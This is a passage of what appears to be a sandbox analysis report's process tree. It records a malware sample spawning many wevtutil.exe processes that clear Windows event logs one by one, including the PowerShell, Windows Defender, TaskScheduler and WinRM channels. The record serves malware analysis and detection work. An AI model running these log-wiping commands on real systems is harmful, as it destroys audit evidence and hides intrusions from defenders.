- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:2508
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:1068
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
    3⤵
    PID:2496
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
    3⤵
    PID:5628
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5004
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
    3⤵
    - Clears Windows event logs
    PID:5076
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
    3⤵
    PID:5184
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
    3⤵
    PID:5288
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
    3⤵
    - Power Settings
    PID:5112
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5132
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
    3⤵
    PID:5536
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
    3⤵
    - Clears Windows event logs
    PID:4172
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
    3⤵
    PID:5276
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
    3⤵
    PID:5320
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
    3⤵
    PID:5204
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
    3⤵
    PID:6356
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
    3⤵
    PID:5652
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
    3⤵
    PID:6408
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
    3⤵
    PID:5928
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
    3⤵
    PID:5684
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
    3⤵
    PID:6444
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
    3⤵
    PID:6768
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
    3⤵
    PID:5556
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
    3⤵
    PID:5248
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
    3⤵
    PID:5508
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
    3⤵
    PID:5496
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
    3⤵
    PID:5632
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
    3⤵
    PID:5480
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
    3⤵
    - Clears Windows event logs
    PID:5460
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
    3⤵
    PID:5360
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
    3⤵
    PID:5560
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
    3⤵
    PID:4200
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
    3⤵
    PID:5568
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
    3⤵
    PID:5696
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
    3⤵
    PID:760
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
    3⤵
    PID:5700
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
    3⤵
    PID:5740
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
    3⤵
    PID:16828
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    PID:5236
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
    3⤵
    PID:6640
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5808
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:5828
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5868
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:5840
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
    3⤵
    PID:5756
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
    3⤵
    PID:5776
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
    3⤵
    PID:15076
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
    3⤵
    PID:5996
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
    3⤵
    PID:6312
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
    3⤵
    PID:6020
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
    3⤵
    PID:16032
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
    3⤵
    PID:5784
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
    3⤵
    PID:5964
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
    3⤵
    - Clears Windows event logs
    PID:5952
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
    3⤵
    - Clears Windows event logs
    PID:6012
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
    3⤵
    PID:6088
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
    3⤵
    PID:6080
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:6308
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
    3⤵
    PID:6060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
    3⤵
    PID:6220
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
    3⤵
    PID:6176
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
    3⤵
    PID:6252
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
    3⤵
    PID:6156
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
    3⤵
    PID:6208
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
    3⤵
    PID:6244
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
    3⤵
    PID:6328
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
    3⤵
    PID:6340
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
    3⤵
    PID:6164
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
    3⤵
    PID:6268
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
    3⤵
    PID:6288
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
    3⤵
    - Clears Windows event logs
    PID:6292
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
    3⤵
    PID:6520
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
    3⤵
    PID:6600
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
    3⤵
    PID:6488
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
    3⤵
    PID:6636
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
    3⤵
    PID:6136
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
    3⤵
    PID:6612
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
    3⤵
    PID:6560
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
    3⤵
    PID:6112
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
    3⤵
    PID:6324
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
    3⤵
    PID:6476
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
    3⤵
    PID:6440
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
    3⤵
    PID:6276
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
    3⤵
    PID:6596
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
    3⤵
    PID:6720
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
    3⤵
    PID:6648
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
    3⤵
    PID:6564
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
    3⤵
    PID:6728
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
    3⤵
    PID:6184
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
    3⤵
    PID:6672
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Analytic"
    3⤵
    PID:6528
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Debug"
    3⤵
    PID:6800
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
    3⤵
    PID:6216
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
    3⤵
    PID:6556
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
    3⤵
    PID:6832
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
    3⤵
    PID:6620
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
    3⤵
    PID:6580
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
    3⤵
    PID:8088
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
    3⤵
    PID:6860
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
    3⤵
    - Clears Windows event logs
    PID:6904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
    3⤵
    PID:6884
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
    3⤵
    PID:6828
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
    3⤵
    PID:6772
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
    3⤵
    PID:7020
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
    3⤵
    PID:6740
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
    3⤵
    PID:7016
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
    3⤵
    PID:17040
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
    3⤵
    PID:6952
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
    3⤵
    PID:7008
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
    3⤵
    PID:7036
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"
    3⤵
    PID:7028
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
    3⤵
    PID:7004
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
    3⤵
    PID:7076
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
    3⤵
    PID:7096
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:6992
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
    3⤵
    PID:7024
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
    3⤵
    PID:340
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
    3⤵
    PID:3744
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
    3⤵
    PID:4812
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
    3⤵
    PID:7116
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
    3⤵
    PID:548
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
    3⤵
    PID:6704
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
    3⤵
    PID:6280
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
    3⤵
    PID:6052
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
    3⤵
    PID:16120
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
    3⤵
    PID:15856
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
    3⤵
    PID:7120
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
    3⤵
    PID:3312
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
    3⤵
    PID:8100
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
    3⤵
    PID:6204
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
    3⤵
    - Clears Windows event logs
    PID:3908
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
    3⤵
    PID:3360
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
    3⤵
    PID:832
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
    3⤵
    PID:7148
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
    3⤵
    PID:6364
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:9988
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
    3⤵
    PID:7032
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
    3⤵
    PID:6956
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
    3⤵
    PID:6912
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
    3⤵
    PID:6916
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
    3⤵
    - Clears Windows event logs
    PID:3860
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
    3⤵
    PID:3948
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
    3⤵
    PID:3828
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
    3⤵
    PID:2748
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
    3⤵
    PID:3956
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
    3⤵
    PID:3904
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
    3⤵
    PID:532
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
    3⤵
    PID:2452
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\wevtutil.exe
